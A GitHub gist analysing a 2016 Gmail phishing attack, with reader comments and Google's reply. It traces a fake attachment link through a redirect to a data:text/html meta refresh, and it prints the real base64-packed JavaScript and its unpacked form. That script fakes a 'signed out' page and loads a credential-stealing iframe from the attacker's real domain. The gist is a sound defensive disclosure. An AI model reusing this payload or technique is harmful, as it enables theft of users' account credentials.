Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Chrome/Gmail attack received 11/03/2016. Not sure if the Chrome meta refresh + data:text,html technique is novel.

The following attack will display a "you've been signed out" page for GMail, and attempt to steal your account credentials.

DO NOT PUT ANY ACCOUNT CREDENTIALS INTO ANY TABS CREATED AFTER VISITING THESE LINKS :)

I received an email in my GMail inbox with a fake attachment image, styled to look like the real GMail attachment UI:

fake

This linked to a page that ended up displaying a fake "you've been signed out" link, via the data:text/html... URL feature of Chrome:

hijack

The hijack page is a fully functional version of Google page, including animation, and is setup to steal passwords:

page.

A little more detail

The fake attachment image linked to http://x5.to/A78

ƒ curl -vvvv http://x5.to/A78
*   Trying 112.78.125.184...
* Connected to x5.to (112.78.125.184) port 80 (#0)
> GET /A78 HTTP/1.1
> Host: x5.to
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Fri, 11 Mar 2016 11:38:08 GMT
< Server: Apache/2.2.31
< Location: http://bowlanreedesntal.top/services/aboutus.htm

The 301'd link uses the meta refresh tag to setup the data/url page, using a base64'd HTML document, again using a data/text:html URL:

ƒ curl http://bowlanreedesntal.top/services/aboutus.htm
<meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail                                                                                                                                                                                                                                    <script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFj
ZShuZXcgUmVnRXhwKCdcXGInK2MrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCczLjIuMTg9
IjE3IDE2IDE5IDIwIDIyIjsyMXsoMTUoKXsxNCAxPTMuMi45KFwnMVwnKTsxLjg9XCc3LzEwLTRc
JzsxLjExPVwnMTMgNFwnOzEuMjM9XCdcJzsyLjI0KFwnMzZcJylbMF0uMzUoMSl9KCkpfTM3KDM4
KXt9My4yLjMzLjMyPSI8NiAyNz1cXCIyNjovLzI1LjI4LzI5LzMxLjMwXFwiIDM5PVxcIjQwOiAw
OzM0OiA1JTsxMjo1JVxcIj48LzY+IjsnLDEwLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNv
bnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHx4fHJlbHxoZWlnaHR8c2hvcnRj
dXR8dmFyfGZ1bmN0aW9ufGhhdmV8WW91fHRpdGxlfGJlZW58U2lnbmVkfHRyeXxvdXR8aHJlZnxn
ZXRFbGVtZW50c0J5VGFnTmFtZXxib3dsYW5yZWVkZXNudGFsfGh0dHB8c3JjfHRvcHxzZXJ2aWNl
c3xodG1sfGNvbnRhY3R1c3xvdXRlckhUTUx8Ym9keXx3aWR0aHxhcHBlbmRDaGlsZHxoZWFkfGNh
dGNofGV8c3R5bGV8Ym9yZGVyJy5zcGxpdCgnfCcpKSkK></script>"

That base64'd HTML decodes to packed JS, which depacks to:

window.document.title = "You have been Signed out";
try {
    (function() {
        var link = window.document.createElement('link');
        link.type = 'image/x-icon';
        link.rel = 'shortcut icon';
        link.href = '';
        document.getElementsByTagName('head')[0].appendChild(link)
    }())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://bowlanreedesntal.top/services/contactus.html\" style=\"border: 0;width: 100%;height:100%\"></iframe>";

Which gives us the final result, a page with the title "You have been Signed out" and the fake login in an iframe.

Great analysis. I just received this from someone and thought it looked fishy. Found this right away.

Great analysis
I'm collecting the spammers' tricks here (https://github.com/KINGSABRI/Spammers). If you would like to contribute your analysis
I intentionally disclose their emails too especially if they reached the inbox and not flagged as a spam

Owner

Response I received from Google about this back in March 2016:

The address bar remains one of the few trusted UI components of the browsers and is the only one that can be relied upon as to what origin are the users currently visiting. If the users pay no attention to the address bar, phishing and spoofing attack are - obviously - trivial. Unfortunately that's how the web works, and any fix that would to try to e.g. detect phishing pages based on their look would be easily bypassable in hundreds of ways. The data: URL part here is not that important as you could have a phishing on any http[s] page just as well.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment